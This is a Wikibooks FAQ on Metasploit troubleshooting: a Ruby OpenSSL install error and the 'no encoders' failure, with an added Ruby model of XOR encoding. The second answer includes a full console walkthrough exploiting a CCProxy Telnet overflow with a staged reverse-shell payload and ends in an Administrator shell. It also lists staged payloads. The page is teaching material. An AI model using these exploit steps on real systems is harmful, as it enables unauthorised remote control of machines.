Metasploit/Frequently Asked Questions

From Wikibooks, open books for an open world
Metasploit
FAQs


Installation

Errors

no such file to load -- openssl (LoadError)

Q: When running Metasploit for the first time, I get the error: no such file to load -- openssl (LoadError)

  • Example:
[~/metasploit]# ./msfgui
./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError)
        from ./lib/rex/socket/ssl_tcp_server.rb:4
        from ./lib/rex/socket/comm/local.rb:5:in `require'
        from ./lib/rex/socket/comm/local.rb:5
        from ./lib/rex/socket.rb:22:in `require'
        from ./lib/rex/socket.rb:22
        from ./lib/rex.rb:71:in `require'
        from ./lib/rex.rb:71
        from ./msfgui:10:in `require'
        from ./msfgui:10

A: Metasploit requires the OpenSSL interface for Ruby (the library loaded by require 'openssl'), not just the standard C implementation of OpenSSL used by Apache etc. Install the relevant ruby-openssl library.

  • Example (for Debian - check your OS or try using gem):
pwebster@metasploit:~$ apt-cache search ruby | grep openssl
libopenssl-ruby - OpenSSL interface for Ruby
libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8
libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9

pwebster@metasploit:~# apt-get install libopenssl-ruby 

Exploit Modules

Errors

Exploit failed: No encoders encoded the buffer successfully

Q: After setting all the required parameters for an exploit module and running exploit, I receive the following error: [-] Exploit failed: No encoders encoded the buffer successfully.

  • Example:
msf > use windows/proxy/ccproxy_telnet_ping
msf exploit(ccproxy_telnet_ping) > info

       Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
    Version: $Revision$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License

Provided by:
  Patrick Webster <patrick [at] aushack.com>

Available targets:
  Id  Name                                 
  --  ----                                 
  0   Windows 2000 Pro SP0 - English       
  1   Windows 2000 Pro SP1 - English       
  2   Windows 2000 Pro SP2 - English       
  3   Windows 2000 Pro SP3 - English       
  4   Windows 2000 Pro SP4 - English       
  5   Windows XP SP0/1 - English           
  6   Windows 2003 Server SP0/1 - English  

Basic options:
  Name   Current Setting  Required  Description         
  ----   ---------------  --------  -----------         
  RHOST  127.0.0.1        yes       The target address  
  RPORT  23               yes       The target port     

Payload information:
  Space: 200
  Avoid: 5 characters

Description:
  This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet 
  service. The stack is overwritten when sending an overly long 
  address to the 'ping' command.

msf exploit(ccproxy_telnet_ping) > set TARGET 4
TARGET => 4
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp 
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(ccproxy_telnet_ping) > check 
[*] The target appears to be vulnerable.
msf exploit(ccproxy_telnet_ping) > exploit 
[-] Exploit failed: No encoders encoded the buffer successfully.

A: The payloads available (show payloads) are determined by the memory 'Space' available for the exploit to use. In the above example, the payload space is 'Space: 200'. In addition, the target application does not allow certain characters to be used (usually the null character 0x00, as this denotes the end of a string [character array]). In the example, the payload must avoid five characters: 'Avoid: 5 characters'.

When you run the exploit, the framework's encoders attempt to fit your desired payload into a space of 200 without using any of the 5 excluded characters. This is not always possible, and a failure results in the error: No encoders encoded the buffer successfully.
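The two ways this step can fail, shown as a simplified model that is added here for illustration and is not Metasploit's encoder code: a single-byte XOR scheme checked against a size budget and an avoid list. The names find_xor_key and try_encode, the stub size and the five avoided values are assumptions, and the inputs are constructed filler bytes rather than real payloads.

```ruby
# Simplified model of the encoding step; this is not Metasploit's encoder code.
STUB_LEN = 24 # assumed size of the decoder stub the encoder prepends

# First single-byte XOR key that keeps the key and every encoded byte out of
# the avoid list, or nil when no key works.
def find_xor_key(raw, avoid)
  seen = raw.bytes.uniq
  (1..255).find do |key|
    !avoid.include?(key) && seen.none? { |b| avoid.include?(b ^ key) }
  end
end

# Returns [:ok, key] when raw fits in space and can be encoded,
# otherwise [:failed, reason].
def try_encode(raw, space:, avoid:)
  total = STUB_LEN + raw.bytesize
  return [:failed, "needs #{total} bytes, space is #{space}"] if total > space

  key = find_xor_key(raw, avoid)
  return [:failed, "every key yields an avoided byte"] if key.nil?

  [:ok, key]
end

# Constructed inputs: filler bytes standing in for payloads, not shellcode.
AVOID     = [0x00, 0x07, 0x0a, 0x0d, 0x20].freeze            # five constructed values
LARGE     = Array.new(290) { |i| 0x40 + (i % 32) }.pack("C*") # too big for a space of 200
SMALL     = Array.new(150) { |i| 0x40 + (i % 32) }.pack("C*") # fits, and a key exists
ALL_BYTES = (0..255).to_a.pack("C*")                          # defeats every key

# Run the three cases and return their results by name.
def demo
  {
    large: try_encode(LARGE, space: 200, avoid: AVOID),
    small: try_encode(SMALL, space: 200, avoid: AVOID),
    all_bytes: try_encode(ALL_BYTES, space: 400, avoid: AVOID)
  }
end

demo.each { |name, result| puts "#{name}: #{result.inspect}" }
```

The first case fails on size alone and the third fails on the avoid list alone; the error message on this page does not say which of the two occurred.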

However, all is not lost. The Metasploit Framework supports staged payloads. A staged payload is a significantly smaller payload which, instead of executing your desired action (such as a reverse shell) directly, starts a staging platform that the rest of the payload is then added to. So in our example, instead of a complete reverse shell, it will:

  1. Create the staging platform.
  2. Allocate enough memory to hold your desired payload.
  3. Obtain the rest of the payload from you.
  4. Execute the payload as a whole.

Generally, staged payloads are denoted by the '/' after the desired payload (compare windows/shell/reverse_tcp with the inline windows/shell_reverse_tcp). Some examples are:

   windows/dllinject/reverse_tcp          Windows Inject DLL, Reverse TCP Stager                                                       
   windows/download_exec/bind_tcp         Windows Executable Download and Execute, Bind TCP Stager                                                                     
   windows/exec/find_tag                  Windows Execute Command, Find Tag Ordinal Stager                                                       
   windows/meterpreter/reverse_tcp        Windows Meterpreter, Reverse TCP Stager                              
   windows/shell/reverse_tcp              Windows Command Shell, Reverse TCP Stager                                                     
   windows/upexec/bind_tcp                Windows Upload/Execute, Bind TCP Stager                           
   windows/vncinject/reverse_ord_tcp      Windows VNC Inject, Reverse Ordinal TCP Stager                       

Now that we know the exploit cannot fit an 'Inline' payload, we can use a stager instead:

...
msf exploit(ccproxy_telnet_ping) > exploit 
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ccproxy_telnet_ping) > exploit 
[*] Started reverse handler
[*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23...
[*] Sending stage (474 bytes)
[*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator>